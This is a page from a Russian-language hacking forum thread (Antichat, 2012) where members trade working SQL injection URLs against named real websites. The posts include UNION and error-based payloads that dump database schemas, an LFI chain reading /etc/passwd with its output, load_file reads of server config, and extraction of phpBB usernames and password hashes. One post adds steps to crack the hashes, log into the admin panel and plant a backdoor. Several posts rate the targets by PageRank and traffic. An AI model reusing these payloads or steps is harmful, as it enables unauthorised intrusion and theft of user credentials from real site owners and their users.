HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 1509 из 1604 « Первая < 5091009140914591499 1505 1506 1507 1508 1509 1510 1511 1512 1513 15191559 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #15081  
Старый 12.06.2012, 13:02
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию
Код:
http://infomedfarmdialog[dot]ru/?module=video_archive&event_id=1+and+0+union+all+select+(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=0x7777776c6f6d6261726430317275)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)--+
User: lombard0@fe56.hc.ru

Database: wwwlombard01ru

Version: 5.1.58-log

PR - 4

CY - 140
 
Ответить с цитированием

  #15082  
Старый 12.06.2012, 21:26
Га-Ноцри
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
Провел на форуме:
103014

Репутация: 76
По умолчанию
ТИЦ == 10, PR == 4, AR ==11,040, трафф.

Число зарегистрированных пользователей сайта == 50674

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//officialpsds.com/tutorials?begin=7'+union+select+1,2,3,4,count(*),6,7,8+from+users--+h[/COLOR][/COLOR] 
Число зарегистрированных пользователей форума == 48040

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//officialpsds.com/tutorials?begin=7'+union+select+1,2,3,4,count(*),6,7,8+from+_vb_user--+h[/COLOR][/COLOR] 
 
Ответить с цитированием

  #15083  
Старый 13.06.2012, 10:24
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
Провел на форуме:
102354

Репутация: 267


По умолчанию
Цитата:
Сообщение от Grifon  
обнаружил инъекцию по адресу http://www.azalsigorta.com/?mod=pages' но при попытке внедрения кода срабатывают фильтры как можно их обойти?
Крутая ситуация) У тебя скулья с LFI. Инклюдится пятая колонка:

Код:
http://www.azalsigorta.com/?mod=1'+union(select+1,2,3,4,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764)--+f
Результат:

Код:
root:x:0:0:root:/root:/bin/bash 
bin:x:1:1:bin:/bin:/sbin/nologin
....
Где 0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f7061737377 64 это ../../../../../etc/passwd.

UPD.

Код:
http://www.azalsigorta.com/?mod=1'+union(select+1,2,version(),4,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764)--+f
В самом низу

Код:
Fatal error: Class '5.5.23-55' not found in /home/azalsigo/public_html/library/core/Core.class.php on line 19
Удачи!
 
Ответить с цитированием

  #15084  
Старый 13.06.2012, 20:53
Га-Ноцри
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
Провел на форуме:
103014

Репутация: 76
По умолчанию
PR == 4;

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.c-registry.us/pages/index.php?pID=77777777'+union+select+1,load_file('/etc/httpd/conf/httpd.conf'),3--+h[/COLOR][/COLOR] 
PR == 3;

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.deals365.us/category.php?catid=-174+union+select+1,version(),3,4--[/COLOR][/COLOR] 
 
Ответить с цитированием

  #15085  
Старый 14.06.2012, 18:31
dutch
Новичок
Регистрация: 07.06.2012
Сообщений: 1
Провел на форуме:
369

Репутация: 0
По умолчанию
тИЦ == 10

PR == 1

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//ventura.rudtp.ru/articles.php?id=4+union+sele.ct+1,2,3,GROUP_CONCAT(table_name,0x0a)+from+information_schema. tables+--[/COLOR][/COLOR] 
 
Ответить с цитированием

  #15086  
Старый 14.06.2012, 19:17
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.ubytok.ru/faq?cat_id=1 and 0 union all select 1,2,3,4,5,6,7,8,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=0x617a62756b61737a5f756279746f6b)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),0--[/COLOR][/COLOR] 
User: azbukasz_ubytok@localhost

Database: azbukasz_ubytok

Version: 5.1.58

PR - 2

CY - 30

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.crisis.ru/links.php?catid=1'+or+1+group+by+mid(version(),rand(0)|0,64)+having+avg(0)--+[/COLOR][/COLOR] 
User: bankrot@localhost

Database: bankrot

Version: 5.0.95

PR - 4

CY - 50
 
Ответить с цитированием

  #15087  
Старый 15.06.2012, 07:35
.Varius
Banned
Регистрация: 05.05.2009
Сообщений: 1,334
Провел на форуме:
5777251

Репутация: 796


По умолчанию
http://forum.av.by/viewforum.php?f=51&model_id=361+union+select+1+fro m(select+count(*),concat(version(),floor(rand(0)|0 ))x+from+information_schema.tables+group+by+2)a+wh ere(1=1)



http://forum.av.by/viewforum.php?f=51&model_id=361+union+select+1+fro m(select+count(*),concat((select+concat_ws(0x3a,us ername,user_password)from+phpbb_users+limit+1,1),f loor(rand(0)|0))x+from+information_schema.tables+g roup+by+2)a+where(1=1)
  1. Login:md5 —> расшифровываем
  2. Админка: /admin/
  3. Делаем ретрив бд
  4. Получаем бекдор в профиле


PR: 5

Pages: 4 430 000

CY: 425

Pages: 379 000

DMOZ: Y

Траф: 54 000
 
Ответить с цитированием

  #15088  
Старый 16.06.2012, 12:16
durito
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639

Репутация: 55
По умолчанию
украинский датинг, жаль народа мало:

Цитата:
Сообщение от None  
http://www.interduet.com/indexcont.php?ptravel=1%27+and+1=2+UnIon+selECt+1, 2,3,4,5,count%28*%29,version%28%29,8+from+user/*
 
Ответить с цитированием

  #15089  
Старый 17.06.2012, 01:41
eregis
Участник форума
Регистрация: 15.07.2010
Сообщений: 104
Провел на форуме:
28145

Репутация: -5
По умолчанию
Код HTML:
http://sport-lights.ru/dir.php?id=-2+union+select+1,2,3,4,5,6,7,group_concat(schema_name+separator+0x3C62723E),9,10,11+from+information_schema.schemata--
Bases:

information_schema

allrecords

autonews

avtobang

avtobudget

avtoclubber

avtogramma

avtokarton

basket-team

basketblog

biatlonblog

bombnews

club

dating

doyouknow

engfootball

engfutbolist

epigraf

flagi

flashgames

footballblog

francefoot

francefootball

gerfoot

gerfootball

incognita

ingectors

italfoot

italyfootball

kinofreaks

kinopazl

kzu

lyrics

memorygame

netnewsmaker

nobel

poller

relaxat

rossfoot

rusfootball

spainfoot

spainfootball

sportemblem

sportnews

trenerchgk

turkfootball

twichange

ukrfoot

ukrfootball

viktorina

Мне не интересны..
 
Ответить с цитированием

  #15090  
Старый 17.06.2012, 02:36
RazyKK
Познающий
Регистрация: 09.02.2009
Сообщений: 70
Провел на форуме:
393885

Репутация: 34
По умолчанию
etuners.gr/en/index.php?s=13&t=296+UNION+SELECT+1,2,3,concat(use r(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20+limit+1,1--

nzho.ru/catalog.php?id=137+union+select+1,concat(user(),ve rsion()),3,4,5+limit+1,1--

wellydiecast.com/product_list.php?id=1+UNION+SELECT+concat(user(),v ersion())+LIMIT+1,1--

operalane.com/shop.php?item_id=15+union+select+1,(user(),version ()),3,4,5,6,7,8,9,10,11,12,13,14,15+limit+1,1--

www.skyproairsoft.com/news_detail.php?id=5+UNION+SELECT+concat%28user%28 %29,version%28%29%29,2,3,4+LIMIT+1,1--
 
Ответить с цитированием
Ответ
Страница 1509 из 1604 « Первая < 5091009140914591499 1505 1506 1507 1508 1509 1510 1511 1512 1513 15191559 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.